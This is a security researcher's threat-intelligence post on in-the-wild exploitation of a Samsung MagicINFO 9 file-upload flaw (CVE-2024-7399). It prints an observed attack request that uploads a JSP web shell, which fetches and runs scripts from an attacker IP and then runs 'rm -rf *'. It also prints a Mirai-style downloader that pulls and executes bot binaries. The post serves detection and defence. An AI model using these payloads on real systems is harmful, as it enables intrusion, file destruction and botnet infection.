Last August, Samsung patched an arbitrary file upload vulnerability that could lead to remote code execution [1]. The announcement was very sparse and did not even include affected systems:

SVP-AUG-2024
SVE-2024-50018(CVE-2024-7399)
Weakness : Improper limitation of a pathname to a restricted directory vulnerability in Samsung MagicINFO 9 Server allows attackers to write arbitrary file as system authority.
Patch information : The patch modifies verification logic of the input.
 

At around the same time, a CVE was assigned to the vulnerability: CVE-2024-7399. The NVD entry has a little bit more details [2]. In particular, it identifies a legacy CMS distributed by Samsung, MagicINFO 9, as the vulnerable software:

Improper limitation of a pathname to a restricted directory vulnerability in Samsung MagicINFO 9 Server version before 21.1050 allows attackers to write arbitrary file as system authority.

For some reason, this vulnerability was covered in a recent article on Cybersecuritynews, providing additional details [3]:

According to the technical analysis, the /MagicInfo/servlet/SWUpdateFileUploader endpoint implemented by the SWUpdateFileUploadServlet class contains multiple security issues.

Sadly, I can not find a reference to the original technical analysis or who it was performed by in Cybersecuritynews article. But we are now seeing some exploit attempts for the issue.

The POST request we are seeing is a typical "IoT Botnet" style request as we have seen many before. It first uses the magicINFO 9 vulnerability to download a script:

POST /MagicInfo/servlet/SWUpdateFileUploader HTTP/1.1
User-Agent: python-requests/2.27.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 1151
Content-Type: multipart/form-data; boundary=4f3a72624fa5c399c5d203d3617891cb

--4f3a72624fa5c399c5d203d3617891cb

Content-Disposition: form-data; name="file"; filename="1746466018shell.jsp"
Content-Type: application/octet-stream

<%@ page import="java.io.*" %>
<%
try {
    String[] cmd = {
        "/bin/sh", "-c",
        "cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; "
        + "wget http://176.65.142.122/ohshit.sh; "
        + "curl -O http://176.65.142.122/ohshit.sh; "
        + "chmod 777 ohshit.sh; sh ohshit.sh; "
        + "tftp 176.65.142.122 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; "
        + "tftp -r ohshit2.sh -g 176.65.142.122; chmod 777 ohshit2.sh; sh ohshit2.sh; "
        + "ftpget -v -u anonymous -p anonymous -P 21 176.65.142.122 ohshit1.sh ohshit1.sh; sh ohshit1.sh; "
        + "rm -rf ohshit.sh ohshit2.sh ohshit1.sh; rm -rf *"
    };
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = reader.readLine()) != null) {
        out.println(line);
    }
} catch (Exception e) {
    out.println("Error: " + e.toString());
}
%>

--4f3a72624fa5c399c5d203d3617891cb--

The bash script contains the usual "multi-architecture" downloader for the actual bot. I am only including the first couple lines here as they repeat for different architectures:

#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.142.122/hiddenbin/boatnet.x86; curl -O http://176.65.142.122/hiddenbin/boatnet.x86;cat boatnet.x86 >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.142.122/hiddenbin/boatnet.mips; curl -O http://176.65.142.122/hiddenbin/boatnet.mips;cat boatnet.mips >WTF;chmod +x *;./WTF
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.142.122/hiddenbin/boatnet.arc; curl -O http://176.65.142.122/hiddenbin/boatnet.arc;cat boatnet.arc >WTF;chmod +x *;./WTF

The "botnet" bot is well recognized by Virustotal and appears to be yet another version of Mirai, which matches the download behavior [4].

[1] https://security.samsungtv.com/securityUpdates
[2] https://nvd.nist.gov/vuln/detail/CVE-2024-7399
[3] https://cybersecuritynews.com/samsung-magicinfo-vulnerability/
[4] https://www.virustotal.com/gui/file/3f26e58cd09804d9c38c6613fb976d8a680555f3eac38a46ef7f3927beaadd26

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|